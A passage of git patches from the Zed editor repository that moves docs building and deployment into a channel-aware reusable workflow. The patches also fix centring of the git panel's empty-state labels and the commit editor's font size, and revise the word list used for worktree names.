+name: deploy_nightly_docs +on: + push: + branches: + - main +jobs: + deploy_docs: + if: (github.repository_owner == 'zed-industries' || github.repository_owner == 'zed-extensions') + permissions: + contents: read + uses: zed-industries/zed/.github/workflows/deploy_docs.yml@main + secrets: + DOCS_AMPLITUDE_API_KEY: ${{ secrets.DOCS_AMPLITUDE_API_KEY }} + CLOUDFLARE_API_TOKEN: ${{ secrets.CLOUDFLARE_API_TOKEN }} + CLOUDFLARE_ACCOUNT_ID: ${{ secrets.CLOUDFLARE_ACCOUNT_ID }} + with: + channel: nightly + checkout_ref: ${{ github.sha }} +defaults: + run: + shell: bash -euxo pipefail {0} diff --git a/.github/workflows/run_tests.yml b/.github/workflows/run_tests.yml index 2051fa567b53af..4ce9b3cc1d6d5a 100644 --- a/.github/workflows/run_tests.yml +++ b/.github/workflows/run_tests.yml @@ -637,8 +637,9 @@ jobs: needs: - orchestrate if: needs.orchestrate.outputs.run_docs == 'true' && github.event_name != 'merge_group' - runs-on: namespace-profile-8x16-ubuntu-2204 + runs-on: namespace-profile-16x32-ubuntu-2204 env: + DOCS_AMPLITUDE_API_KEY: ${{ secrets.DOCS_AMPLITUDE_API_KEY }} CC: clang CXX: clang++ steps: @@ -655,27 +656,30 @@ jobs: with: cache: rust path: ~/.rustup - - name: run_tests::check_docs::lychee_link_check - uses: lycheeverse/lychee-action@82202e5e9c2f4ef1a55a3d02563e1cb6041e5332 - with: - args: --no-progress --exclude '^http' './docs/src/**/*' - fail: true - jobSummary: false - name: steps::setup_linux run: ./script/linux - name: steps::download_wasi_sdk run: ./script/download-wasi-sdk - name: ./script/generate-action-metadata run: ./script/generate-action-metadata - - name: run_tests::check_docs::install_mdbook + - name: deploy_docs::lychee_link_check + uses: lycheeverse/lychee-action@82202e5e9c2f4ef1a55a3d02563e1cb6041e5332 + with: + args: --no-progress --exclude '^http' './docs/src/**/*' + fail: true + jobSummary: false + - name: deploy_docs::install_mdbook uses: peaceiris/actions-mdbook@ee69d230fe19748b7abf22df32acaa93833fad08 with: mdbook-version: 0.4.37 - - 
name: run_tests::check_docs::build_docs + - name: deploy_docs::build_docs_book run: | mkdir -p target/deploy mdbook build ./docs --dest-dir=../target/deploy/docs/ - - name: run_tests::check_docs::lychee_link_check + env: + DOCS_CHANNEL: stable + MDBOOK_BOOK__SITE_URL: /docs/ + - name: deploy_docs::lychee_link_check uses: lycheeverse/lychee-action@82202e5e9c2f4ef1a55a3d02563e1cb6041e5332 with: args: --no-progress --exclude '^http' 'target/deploy/docs' diff --git a/crates/docs_preprocessor/src/main.rs b/crates/docs_preprocessor/src/main.rs index 6655d86d25c90b..5b860ba16cdd8b 100644 --- a/crates/docs_preprocessor/src/main.rs +++ b/crates/docs_preprocessor/src/main.rs @@ -679,6 +679,12 @@ fn handle_postprocessing() -> Result<()> { .to_string(); let amplitude_key = std::env::var("DOCS_AMPLITUDE_API_KEY").unwrap_or_default(); let consent_io_instance = std::env::var("DOCS_CONSENT_IO_INSTANCE").unwrap_or_default(); + let docs_channel = std::env::var("DOCS_CHANNEL").unwrap_or_else(|_| "stable".to_string()); + let noindex = if docs_channel == "nightly" || docs_channel == "preview" { + "" + } else { + "" + }; output.insert("html".to_string(), zed_html); mdbook::Renderer::render(&mdbook::renderer::HtmlHandlebars::new(), &ctx)?; @@ -749,6 +755,7 @@ fn handle_postprocessing() -> Result<()> { let contents = contents.replace("#description#", meta_description); let contents = contents.replace("#amplitude_key#", &litude_key); let contents = contents.replace("#consent_io_instance#", &consent_io_instance); + let contents = contents.replace("#noindex#", noindex); let contents = title_regex() .replace(&contents, |_: ®ex::Captures| { format!("{}", meta_title) diff --git a/docs/theme/index.hbs b/docs/theme/index.hbs index 24378bcca6909b..2c7786817aa2f1 100644 --- a/docs/theme/index.hbs +++ b/docs/theme/index.hbs @@ -30,6 +30,7 @@ {{#if is_print }} {{/if}} + #noindex# {{#if base_url}} {{/if}} diff --git a/tooling/xtask/src/tasks/workflows.rs b/tooling/xtask/src/tasks/workflows.rs index 
2e21363bb65003..b275503f34d125 100644 --- a/tooling/xtask/src/tasks/workflows.rs +++ b/tooling/xtask/src/tasks/workflows.rs @@ -15,6 +15,7 @@ mod compare_perf; mod compliance_check; mod danger; mod deploy_collab; +mod deploy_docs; mod extension_auto_bump; mod extension_bump; mod extension_tests; @@ -203,6 +204,8 @@ pub fn run_workflows(args: GenerateWorkflowArgs) -> Result<()> { WorkflowFile::zed(compliance_check::compliance_check), WorkflowFile::zed(danger::danger), WorkflowFile::zed(deploy_collab::deploy_collab), + WorkflowFile::zed(deploy_docs::deploy_docs), + WorkflowFile::zed(deploy_docs::deploy_nightly_docs), WorkflowFile::zed(extension_bump::extension_bump), WorkflowFile::zed(extension_auto_bump::extension_auto_bump), WorkflowFile::zed(extension_tests::extension_tests), diff --git a/tooling/xtask/src/tasks/workflows/after_release.rs b/tooling/xtask/src/tasks/workflows/after_release.rs index 07ff1fba0d4799..fe96325c7fd286 100644 --- a/tooling/xtask/src/tasks/workflows/after_release.rs +++ b/tooling/xtask/src/tasks/workflows/after_release.rs @@ -1,15 +1,19 @@ use gh_workflow::*; use crate::tasks::workflows::{ + deploy_docs::deploy_docs_workflow_call, release::{self, notify_on_failure}, runners, steps::{CommonJobConditions, NamedJob, checkout_repo, dependant_job, named}, vars::{self, StepOutput, WorkflowInput}, }; -const TAG_NAME: &str = "${{ github.event.release.tag_name || inputs.tag_name }}"; -const IS_PRERELEASE: &str = "${{ github.event.release.prerelease || inputs.prerelease }}"; +const TAG_NAME_ENV: &str = "${{ github.event.release.tag_name || inputs.tag_name }}"; +const IS_PRERELEASE_ENV: &str = "${{ github.event.release.prerelease || inputs.prerelease }}"; +const TAG_NAME: &str = "${{ env.TAG_NAME }}"; const RELEASE_BODY: &str = "${{ github.event.release.body || inputs.body }}"; +const DOCS_CHANNEL: &str = + "${{ (github.event.release.prerelease || inputs.prerelease) && 'preview' || 'stable' }}"; pub fn after_release() -> Workflow { let tag_name = 
WorkflowInput::string("tag_name", None); @@ -17,17 +21,26 @@ pub fn after_release() -> Workflow { let body = WorkflowInput::string("body", Some(String::new())); let refresh_zed_dev = rebuild_releases_page(); + let deploy_docs = deploy_docs_workflow_call(DOCS_CHANNEL, TAG_NAME_ENV); let post_to_discord = post_to_discord(&[&refresh_zed_dev]); let publish_winget = publish_winget(); let create_sentry_release = create_sentry_release(); - let notify_on_failure = notify_on_failure(&[ - &refresh_zed_dev, - &post_to_discord, - &publish_winget, - &create_sentry_release, - ]); + let notify_on_failure = { + let notify_on_failure = notify_on_failure(&[ + &refresh_zed_dev, + &post_to_discord, + &publish_winget, + &create_sentry_release, + ]); + NamedJob { + name: notify_on_failure.name, + job: notify_on_failure.job.add_need(deploy_docs.name.clone()), + } + }; named::workflow() + .add_env(("TAG_NAME", TAG_NAME_ENV)) + .add_env(("IS_PRERELEASE", IS_PRERELEASE_ENV)) .on(Event::default() .release(Release::default().types(vec![ReleaseType::Published])) .workflow_dispatch( @@ -37,6 +50,7 @@ pub fn after_release() -> Workflow { .add_input(body.name, body.input()), )) .add_job(refresh_zed_dev.name, refresh_zed_dev.job) + .add_job(deploy_docs.name, deploy_docs.job) .add_job(post_to_discord.name, post_to_discord.job) .add_job(publish_winget.name, publish_winget.job) .add_job(create_sentry_release.name, create_sentry_release.job) @@ -45,9 +59,7 @@ pub fn after_release() -> Workflow { fn rebuild_releases_page() -> NamedJob { fn refresh_cloud_releases() -> Step { - named::bash(format!( - "curl -fX POST https://cloud.zed.dev/releases/refresh?expect_tag={TAG_NAME}" - )) + named::bash("curl -fX POST \"https://cloud.zed.dev/releases/refresh?expect_tag=$TAG_NAME\"") } fn redeploy_zed_dev() -> Step { @@ -66,16 +78,16 @@ fn rebuild_releases_page() -> NamedJob { fn post_to_discord(deps: &[&NamedJob]) -> NamedJob { fn get_release_url() -> Step { - named::bash(format!( - r#"if [ "{IS_PRERELEASE}" == 
"true" ]; then + named::bash( + r#"if [ "$IS_PRERELEASE" == "true" ]; then URL="https://zed.dev/releases/preview" else URL="https://zed.dev/releases/stable" fi echo "URL=$URL" >> "$GITHUB_OUTPUT" -"# - )) +"#, + ) .id("get-release-url") } @@ -136,17 +148,15 @@ fn publish_winget() -> NamedJob { } fn set_package_name() -> (Step, StepOutput) { - let script = format!( - r#"if ("{IS_PRERELEASE}" -eq "true") {{ + let script = r#"if ($env:IS_PRERELEASE -eq "true") { $PACKAGE_NAME = "ZedIndustries.Zed.Preview" -}} else {{ +} else { $PACKAGE_NAME = "ZedIndustries.Zed" -}} +} echo "PACKAGE_NAME=$PACKAGE_NAME" >> $env:GITHUB_OUTPUT -"# - ); - let step = named::pwsh(&script).id("set-package-name"); +"#; + let step = named::pwsh(script).id("set-package-name"); let output = StepOutput::new(&step, "PACKAGE_NAME"); (step, output) diff --git a/tooling/xtask/src/tasks/workflows/deploy_docs.rs b/tooling/xtask/src/tasks/workflows/deploy_docs.rs new file mode 100644 index 00000000000000..c2cb6331816ae3 --- /dev/null +++ b/tooling/xtask/src/tasks/workflows/deploy_docs.rs @@ -0,0 +1,360 @@ +use gh_workflow::{ + Event, Expression, Input, Job, Level, Permissions, Push, Run, Step, Use, UsesJob, Workflow, + WorkflowCall, WorkflowCallSecret, WorkflowDispatch, +}; + +use crate::tasks::workflows::{ + runners, + steps::{self, CommonJobConditions, FluentBuilder as _, NamedJob, named, release_job}, + vars::{self, StepOutput, WorkflowInput}, +}; + +const BUILD_OUTPUT_DIR: &str = "target/deploy"; + +pub(crate) enum DocsChannel { + Nightly, + Preview, + Stable, +} + +impl DocsChannel { + pub(crate) fn site_url(&self) -> &'static str { + match self { + Self::Nightly => "/docs/nightly/", + Self::Preview => "/docs/preview/", + Self::Stable => "/docs/", + } + } + + pub(crate) fn project_name(&self) -> &'static str { + match self { + Self::Nightly => "docs-nightly", + Self::Preview => "docs-preview", + Self::Stable => "docs", + } + } + + pub(crate) fn channel_name(&self) -> &'static str { + match self { + 
Self::Nightly => "nightly", + Self::Preview => "preview", + Self::Stable => "stable", + } + } +} + +pub(crate) fn lychee_link_check(dir: &str) -> Step { + named::uses( + "lycheeverse", + "lychee-action", + "82202e5e9c2f4ef1a55a3d02563e1cb6041e5332", + ) // v2.4.1 + .add_with(("args", format!("--no-progress --exclude '^http' '{dir}'"))) + .add_with(("fail", true)) + .add_with(("jobSummary", false)) +} + +pub(crate) fn install_mdbook() -> Step { + named::uses( + "peaceiris", + "actions-mdbook", + "ee69d230fe19748b7abf22df32acaa93833fad08", // v2 + ) + .with(("mdbook-version", "0.4.37")) +} + +pub(crate) fn build_docs_book(docs_channel: String, site_url: String) -> Step { + named::bash(indoc::formatdoc! {r#" + mkdir -p {BUILD_OUTPUT_DIR} + mdbook build ./docs --dest-dir=../{BUILD_OUTPUT_DIR}/docs/ + "#}) + .add_env(("DOCS_CHANNEL", docs_channel)) + .add_env(("MDBOOK_BOOK__SITE_URL", site_url)) +} + +fn docs_build_steps( + job: Job, + checkout_ref: Option, + docs_channel: impl Into, + site_url: impl Into, +) -> Job { + let docs_channel = docs_channel.into(); + let site_url = site_url.into(); + + steps::use_clang( + job.add_env(("DOCS_AMPLITUDE_API_KEY", vars::DOCS_AMPLITUDE_API_KEY)) + .add_step( + steps::checkout_repo().when_some(checkout_ref, |step, checkout_ref| { + step.with_ref(checkout_ref) + }), + ) + .runs_on(runners::LINUX_XL) + .add_step(steps::setup_cargo_config(runners::Platform::Linux)) + .add_step(steps::cache_rust_dependencies_namespace()) + .map(steps::install_linux_dependencies) + .add_step(steps::script("./script/generate-action-metadata")) + .add_step(lychee_link_check("./docs/src/**/*")) + .add_step(install_mdbook()) + .add_step(build_docs_book(docs_channel, site_url)) + .add_step(lychee_link_check(&format!("{BUILD_OUTPUT_DIR}/docs"))), + ) +} + +fn docs_deploy_steps(job: Job, project_name: &StepOutput) -> Job { + fn deploy_to_cf_pages(project_name: &StepOutput) -> Step { + named::uses( + "cloudflare", + "wrangler-action", + 
"da0e0dfe58b7a431659754fdf3f186c529afbe65", + ) // v3 + .add_with(("apiToken", vars::CLOUDFLARE_API_TOKEN)) + .add_with(("accountId", vars::CLOUDFLARE_ACCOUNT_ID)) + .add_with(( + "command", + format!( + "pages deploy {BUILD_OUTPUT_DIR} --project-name=${{{{ {} }}}} --branch main", + project_name.expr() + ), + )) + } + + fn upload_install_script() -> Step { + named::uses( + "cloudflare", + "wrangler-action", + "da0e0dfe58b7a431659754fdf3f186c529afbe65", + ) // v3 + .add_with(("apiToken", vars::CLOUDFLARE_API_TOKEN)) + .add_with(("accountId", vars::CLOUDFLARE_ACCOUNT_ID)) + .add_with(( + "command", + "r2 object put -f script/install.sh zed-open-source-website-assets/install.sh", + )) + } + + fn deploy_docs_worker() -> Step { + named::uses( + "cloudflare", + "wrangler-action", + "da0e0dfe58b7a431659754fdf3f186c529afbe65", + ) // v3 + .add_with(("apiToken", vars::CLOUDFLARE_API_TOKEN)) + .add_with(("accountId", vars::CLOUDFLARE_ACCOUNT_ID)) + .add_with(("command", "deploy .cloudflare/docs-proxy/src/worker.js")) + } + + fn upload_wrangler_logs() -> Step { + named::uses( + "actions", + "upload-artifact", + "ea165f8d65b6e75b540449e92b4886f43607fa02", + ) // v4 + .if_condition(Expression::new("always()")) + .add_with(("name", "wrangler_logs")) + .add_with(("path", "/home/runner/.config/.wrangler/logs/")) + } + + job.add_step(deploy_to_cf_pages(project_name)) + .add_step(upload_install_script()) + .add_step(deploy_docs_worker()) + .add_step(upload_wrangler_logs()) +} + +pub(crate) fn check_docs() -> NamedJob { + NamedJob { + name: "check_docs".to_owned(), + job: docs_build_steps( + release_job(&[]), + None, + DocsChannel::Stable.channel_name(), + DocsChannel::Stable.site_url(), + ), + } +} + +fn resolve_channel_step( + channel_expr: impl Into, +) -> (Step, StepOutput, StepOutput, StepOutput) { + let step = Step::new("deploy_docs::resolve_channel_step").run(format!( + indoc::indoc! 
{r#" + if [ -z "$CHANNEL" ]; then + if [ "$GITHUB_REF" = "refs/heads/main" ]; then + CHANNEL="nightly" + else + echo "::error::channel input is required when ref is not main." + exit 1 + fi + fi + + case "$CHANNEL" in + "nightly") + SITE_URL="{nightly_site_url}" + PROJECT_NAME="{nightly_project_name}" + ;; + "preview") + SITE_URL="{preview_site_url}" + PROJECT_NAME="{preview_project_name}" + ;; + "stable") + SITE_URL="{stable_site_url}" + PROJECT_NAME="{stable_project_name}" + ;; + *) + echo "::error::Invalid docs channel '$CHANNEL'. Expected one of: nightly, preview, stable." + exit 1 + ;; + esac + + {{ + echo "channel=$CHANNEL" + echo "site_url=$SITE_URL" + echo "project_name=$PROJECT_NAME" + }} >> "$GITHUB_OUTPUT" + "#}, + nightly_site_url = DocsChannel::Nightly.site_url(), + preview_site_url = DocsChannel::Preview.site_url(), + stable_site_url = DocsChannel::Stable.site_url(), + nightly_project_name = DocsChannel::Nightly.project_name(), + preview_project_name = DocsChannel::Preview.project_name(), + stable_project_name = DocsChannel::Stable.project_name(), + )) + .id("resolve-channel") + .add_env(("CHANNEL", channel_expr.into())); + + let channel = StepOutput::new(&step, "channel"); + let site_url = StepOutput::new(&step, "site_url"); + let project_name = StepOutput::new(&step, "project_name"); + (step, channel, site_url, project_name) +} + +fn docs_job(channel_expr: impl Into, checkout_ref: Option) -> NamedJob { + let (resolve_step, channel, site_url, project_name) = resolve_channel_step(channel_expr); + + NamedJob { + name: "deploy_docs".to_owned(), + job: docs_deploy_steps( + docs_build_steps( + release_job(&[]) + .cond(Expression::new( + "github.repository_owner == 'zed-industries'", + )) + .name("Build and Deploy Docs") + .add_step(resolve_step), + checkout_ref, + channel.to_string(), + site_url.to_string(), + ), + &project_name, + ), + } +} + +pub(crate) fn deploy_docs_workflow_call( + channel: impl Into, + checkout_ref: impl Into, +) -> NamedJob { + let 
job = Job::default() + .with_repository_owner_guard() + .permissions(Permissions::default().contents(Level::Read)) + .uses( + "zed-industries", + "zed", + ".github/workflows/deploy_docs.yml", + "main", + ) + .with( + Input::default() + .add("channel", channel.into()) + .add("checkout_ref", checkout_ref.into()), + ) + .secrets(indexmap::IndexMap::from([ + ( + "DOCS_AMPLITUDE_API_KEY".to_owned(), + vars::DOCS_AMPLITUDE_API_KEY.to_owned(), + ), + ( + "CLOUDFLARE_API_TOKEN".to_owned(), + vars::CLOUDFLARE_API_TOKEN.to_owned(), + ), + ( + "CLOUDFLARE_ACCOUNT_ID".to_owned(), + vars::CLOUDFLARE_ACCOUNT_ID.to_owned(), + ), + ])); + + NamedJob { + name: "deploy_docs".to_owned(), + job, + } +} + +pub(crate) fn deploy_docs_job( + channel_input: &WorkflowInput, + checkout_ref_input: &WorkflowInput, +) -> NamedJob { + docs_job( + channel_input.to_string(), + Some(format!( + "${{{{ {} != '' && {} || github.sha }}}}", + checkout_ref_input.expr(), + checkout_ref_input.expr() + )), + ) +} + +pub(crate) fn deploy_docs() -> Workflow { + let channel = WorkflowInput::string("channel", Some(String::new())) + .description("Docs channel to deploy: nightly, preview, or stable"); + let checkout_ref = WorkflowInput::string("checkout_ref", Some(String::new())) + .description("Git ref to checkout and deploy. 
Defaults to event SHA when omitted."); + let deploy_docs = deploy_docs_job(&channel, &checkout_ref); + + named::workflow() + .add_event( + Event::default().workflow_dispatch( + WorkflowDispatch::default() + .add_input(channel.name, channel.input()) + .add_input(checkout_ref.name, checkout_ref.input()), + ), + ) + .add_event( + Event::default().workflow_call( + WorkflowCall::default() + .add_input(channel.name, channel.call_input()) + .add_input(checkout_ref.name, checkout_ref.call_input()) + .secrets([ + ( + "DOCS_AMPLITUDE_API_KEY".to_owned(), + WorkflowCallSecret { + description: "DOCS_AMPLITUDE_API_KEY".to_owned(), + required: true, + }, + ), + ( + "CLOUDFLARE_API_TOKEN".to_owned(), + WorkflowCallSecret { + description: "CLOUDFLARE_API_TOKEN".to_owned(), + required: true, + }, + ), + ( + "CLOUDFLARE_ACCOUNT_ID".to_owned(), + WorkflowCallSecret { + description: "CLOUDFLARE_ACCOUNT_ID".to_owned(), + required: true, + }, + ), + ]), + ), + ) + .add_job(deploy_docs.name, deploy_docs.job) +} + +pub(crate) fn deploy_nightly_docs() -> Workflow { + let deploy_docs = deploy_docs_workflow_call("nightly", "${{ github.sha }}"); + + named::workflow() + .name("deploy_nightly_docs") + .add_event(Event::default().push(Push::default().add_branch("main"))) + .add_job(deploy_docs.name, deploy_docs.job) +} diff --git a/tooling/xtask/src/tasks/workflows/run_tests.rs b/tooling/xtask/src/tasks/workflows/run_tests.rs index 644c033f681f51..0bbff446a750d2 100644 --- a/tooling/xtask/src/tasks/workflows/run_tests.rs +++ b/tooling/xtask/src/tasks/workflows/run_tests.rs @@ -15,6 +15,7 @@ use crate::tasks::workflows::{ }; use super::{ + deploy_docs, runners::{self, Arch, Platform}, steps::{self, FluentBuilder, NamedJob, named, release_job}, }; @@ -82,7 +83,7 @@ pub(crate) fn run_tests() -> Workflow { .then(check_dependencies()), // could be more specific here? 
should_check_docs .and_not_in_merge_queue() - .then(check_docs()), + .then(deploy_docs::check_docs()), should_check_licences .and_not_in_merge_queue() .then(check_licenses()), @@ -713,54 +714,6 @@ fn check_licenses() -> NamedJob { ) } -fn check_docs() -> NamedJob { - fn lychee_link_check(dir: &str) -> Step { - named::uses( - "lycheeverse", - "lychee-action", - "82202e5e9c2f4ef1a55a3d02563e1cb6041e5332", - ) // v2.4.1 - .add_with(("args", format!("--no-progress --exclude '^http' '{dir}'"))) - .add_with(("fail", true)) - .add_with(("jobSummary", false)) - } - - fn install_mdbook() -> Step { - named::uses( - "peaceiris", - "actions-mdbook", - "ee69d230fe19748b7abf22df32acaa93833fad08", // v2 - ) - .with(("mdbook-version", "0.4.37")) - } - - fn build_docs() -> Step { - named::bash(indoc::indoc! {r#" - mkdir -p target/deploy - mdbook build ./docs --dest-dir=../target/deploy/docs/ - "#}) - } - - named::job(use_clang( - release_job(&[]) - .runs_on(runners::LINUX_LARGE) - .add_step(steps::checkout_repo()) - .add_step(steps::setup_cargo_config(Platform::Linux)) - // todo(ci): un-inline build_docs/action.yml here - .add_step(steps::cache_rust_dependencies_namespace()) - .add_step( - lychee_link_check("./docs/src/**/*"), // check markdown links - ) - .map(steps::install_linux_dependencies) - .add_step(steps::script("./script/generate-action-metadata")) - .add_step(install_mdbook()) - .add_step(build_docs()) - .add_step( - lychee_link_check("target/deploy/docs"), // check links in generated html - ), - )) -} - pub(crate) fn check_scripts() -> NamedJob { fn download_actionlint() -> Step { named::bash( diff --git a/tooling/xtask/src/tasks/workflows/steps.rs b/tooling/xtask/src/tasks/workflows/steps.rs index df0f6aababdedd..2e13427d603ac4 100644 --- a/tooling/xtask/src/tasks/workflows/steps.rs +++ b/tooling/xtask/src/tasks/workflows/steps.rs @@ -137,6 +137,8 @@ impl From for Step { } } +impl FluentBuilder for CheckoutStep {} + pub fn checkout_repo() -> CheckoutStep { 
CheckoutStep::default() } diff --git a/tooling/xtask/src/tasks/workflows/vars.rs b/tooling/xtask/src/tasks/workflows/vars.rs index 87010b9b79a749..6f6fca5e2ab719 100644 --- a/tooling/xtask/src/tasks/workflows/vars.rs +++ b/tooling/xtask/src/tasks/workflows/vars.rs @@ -51,6 +51,9 @@ secret!(SLACK_WEBHOOK_WORKFLOW_FAILURES); secret!(R2_ACCOUNT_ID); secret!(R2_ACCESS_KEY_ID); secret!(R2_SECRET_ACCESS_KEY); +secret!(CLOUDFLARE_API_TOKEN); +secret!(CLOUDFLARE_ACCOUNT_ID); +secret!(DOCS_AMPLITUDE_API_KEY); // todo(ci) make these secrets too... var!(AZURE_SIGNING_ACCOUNT_NAME); From 514fe331968ec6fbb70ecc0ecee483fad6c97360 Mon Sep 17 00:00:00 2001 From: Dong Date: Thu, 30 Apr 2026 19:30:06 +0800 Subject: [PATCH 114/231] git_panel: Fix empty state label not align to center (#55235) When the git panel is too narrow for "No changes to commit" or "No Git Repositories" to fit on a single line, the wrapped lines were start-aligned while the button below remained centered, breaking the visual stack. This wraps each label in a stretched, text-centered `div`, matching the pattern already used by `render_unsafe_repo_ui` in the same file. The bare string is kept (no `Label`) so the parent `v_flex`'s `text_color(Color::Placeholder)` continues to apply unchanged. 
### Repository detect | As-is | To-be | | --- | --- | | | | ### Repository not detect | As-is | To-be | | --- | --- | | | | Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [ ] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Closes N/A Release Notes: - git_panel: Fixed empty state labels in the git panel becoming left-aligned when wrapped to multiple lines --- crates/git_ui/src/git_panel.rs | 14 ++++++++++++-- 1 file changed, 12 insertions(+), 2 deletions(-) diff --git a/crates/git_ui/src/git_panel.rs b/crates/git_ui/src/git_panel.rs index f0900b56bccad1..d2cc266e0f2c80 100644 --- a/crates/git_ui/src/git_panel.rs +++ b/crates/git_ui/src/git_panel.rs @@ -4824,7 +4824,13 @@ impl GitPanel { } fn render_no_changes_ui(&self, cx: &Context) -> Vec { - let mut elements: Vec = vec!["No changes to commit".into_any_element()]; + let mut elements: Vec = vec![ + div() + .self_stretch() + .text_center() + .child("No changes to commit") + .into_any_element(), + ]; if self.changes_count == 0 && !self.is_on_main_branch(cx) { elements.push( @@ -4906,7 +4912,11 @@ impl GitPanel { let worktree_count = self.project.read(cx).visible_worktrees(cx).count(); if worktree_count > 0 && self.active_repository.is_none() { vec![ - "No Git Repositories".into_any_element(), + div() + .self_stretch() + .text_center() + .child("No Git Repositories") + .into_any_element(), panel_filled_button("Initialize Repository") .tooltip(Tooltip::for_action_title_in( "git init", From c52d559ddf86c06a753be15190fe51b238e2ed00 Mon Sep 17 00:00:00 2001 From: Mikhail Pertsev Date: Thu, 30 Apr 2026 13:33:31 +0200 Subject: [PATCH 115/231] git_ui: Fix the Git panel commit message editor ignoring `buffer_font_size` (#55233) Closes 
#55227 Updates the Git panel commit message editor to respect the configured `buffer_font_size` when using buffer/editor typography. This keeps the commit box visually consistent with other editor text while preserving the existing UI-font sizing path for non-buffer panel editor styles. Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Release Notes: - Fixed the Git panel commit message editor ignoring `buffer_font_size` --- crates/git_ui/src/git_panel.rs | 69 ++++++++++++++++++++++------------ 1 file changed, 46 insertions(+), 23 deletions(-) diff --git a/crates/git_ui/src/git_panel.rs b/crates/git_ui/src/git_panel.rs index d2cc266e0f2c80..d4cf03c853848a 100644 --- a/crates/git_ui/src/git_panel.rs +++ b/crates/git_ui/src/git_panel.rs @@ -37,9 +37,9 @@ use git::{ StashApply, StashPop, ToggleFillCommitEditor, TrashUntrackedFiles, UnstageAll, }; use gpui::{ - Action, Anchor, AsyncApp, AsyncWindowContext, Bounds, ClickEvent, DismissEvent, Empty, Entity, - EventEmitter, FocusHandle, Focusable, KeyContext, MouseButton, MouseDownEvent, Point, - PromptLevel, ScrollStrategy, Subscription, Task, TextStyle, UniformListScrollHandle, + AbsoluteLength, Action, Anchor, AsyncApp, AsyncWindowContext, Bounds, ClickEvent, DismissEvent, + Empty, Entity, EventEmitter, FocusHandle, Focusable, KeyContext, MouseButton, MouseDownEvent, + Point, PromptLevel, ScrollStrategy, Subscription, Task, TextStyle, UniformListScrollHandle, WeakEntity, actions, anchored, deferred, point, size, uniform_list, }; use itertools::Itertools; @@ -6158,25 +6158,27 @@ pub fn panel_editor_container(_window: &mut Window, cx: &mut App) -> Div { pub(crate) fn 
panel_editor_style(monospace: bool, window: &Window, cx: &App) -> EditorStyle { let settings = ThemeSettings::get_global(cx); - let font_size = TextSize::Small.rems(cx).to_pixels(window.rem_size()); - - let (font_family, font_fallbacks, font_features, font_weight, line_height) = if monospace { - ( - settings.buffer_font.family.clone(), - settings.buffer_font.fallbacks.clone(), - settings.buffer_font.features.clone(), - settings.buffer_font.weight, - font_size * settings.buffer_line_height.value(), - ) - } else { - ( - settings.ui_font.family.clone(), - settings.ui_font.fallbacks.clone(), - settings.ui_font.features.clone(), - settings.ui_font.weight, - window.line_height(), - ) - }; + let (font_family, font_fallbacks, font_features, font_size, font_weight, line_height) = + if monospace { + let font_size = settings.buffer_font_size(cx); + ( + settings.buffer_font.family.clone(), + settings.buffer_font.fallbacks.clone(), + settings.buffer_font.features.clone(), + AbsoluteLength::from(font_size), + settings.buffer_font.weight, + font_size * settings.buffer_line_height.value(), + ) + } else { + ( + settings.ui_font.family.clone(), + settings.ui_font.fallbacks.clone(), + settings.ui_font.features.clone(), + AbsoluteLength::from(TextSize::Small.rems(cx)), + settings.ui_font.weight, + window.line_height(), + ) + }; EditorStyle { background: cx.theme().colors().editor_background, @@ -6186,7 +6188,7 @@ pub(crate) fn panel_editor_style(monospace: bool, window: &Window, cx: &App) -> font_family, font_fallbacks, font_features, - font_size: TextSize::Small.rems(cx).into(), + font_size, font_weight, line_height: line_height.into(), ..Default::default() @@ -8406,4 +8408,25 @@ mod tests { )); }); } + + #[gpui::test] + async fn test_panel_editor_style_uses_buffer_font_size(cx: &mut TestAppContext) { + init_test(cx); + + cx.update(|cx| { + SettingsStore::update_global(cx, |store, cx| { + store.update_user_settings(cx, |settings| { + settings.theme.buffer_font_size = 
Some(20.0.into()); + }); + }); + }); + + cx.add_window(|window, cx| { + let style = panel_editor_style(true, window, cx); + + assert_eq!(style.text.font_size.to_pixels(window.rem_size()), px(20.0)); + + Editor::single_line(window, cx) + }); + } } From f73bc562e2a8c76da3faf08a3b09bd0abd56c28e Mon Sep 17 00:00:00 2001 From: Cameron Mcloughlin Date: Thu, 30 Apr 2026 12:39:06 +0100 Subject: [PATCH 116/231] git: Remove potentially confusing words from worktree names (#55314) Changes the list of words used when generating random worktree names to avoid anything even tangentially related to software engineering. Release Notes: - N/A or Added/Fixed/Improved ... --- crates/git_ui/src/worktree_names.rs | 92 ++++++++++++++--------------- 1 file changed, 46 insertions(+), 46 deletions(-) diff --git a/crates/git_ui/src/worktree_names.rs b/crates/git_ui/src/worktree_names.rs index 68be75cb4c66ef..ad09907107bfd6 100644 --- a/crates/git_ui/src/worktree_names.rs +++ b/crates/git_ui/src/worktree_names.rs @@ -2,59 +2,59 @@ use collections::HashSet; use rand::Rng; const ADJECTIVES: &[&str] = &[ - "able", "agate", "agile", "alpine", "amber", "ample", "aqua", "arctic", "arid", "astral", - "autumn", "avid", "azure", "balmy", "birch", "bold", "boreal", "brave", "breezy", "brief", - "bright", "brisk", "broad", "bronze", "calm", "cerith", "civil", "clean", "clear", "clever", - "cobalt", "cool", "copper", "coral", "cozy", "crisp", "cubic", "cyan", "deft", "dense", "dewy", - "direct", "dusky", "dusty", "eager", "early", "earnest", "elder", "elfin", "equal", "even", - "exact", "faint", "fair", "fast", "fawn", "ferny", "fiery", "fine", "firm", "fleet", "floral", - "focal", "fond", "frank", "fresh", "frosty", "full", "gentle", "gilded", "glacial", "glad", - "glossy", "golden", "grand", "green", "gusty", "hale", "happy", "hardy", "hazel", "hearty", - "hilly", "humble", "hushed", "icy", "ideal", "inner", "iron", "ivory", "jade", "jovial", - "keen", "kind", "lapis", "leafy", "level", "light", 
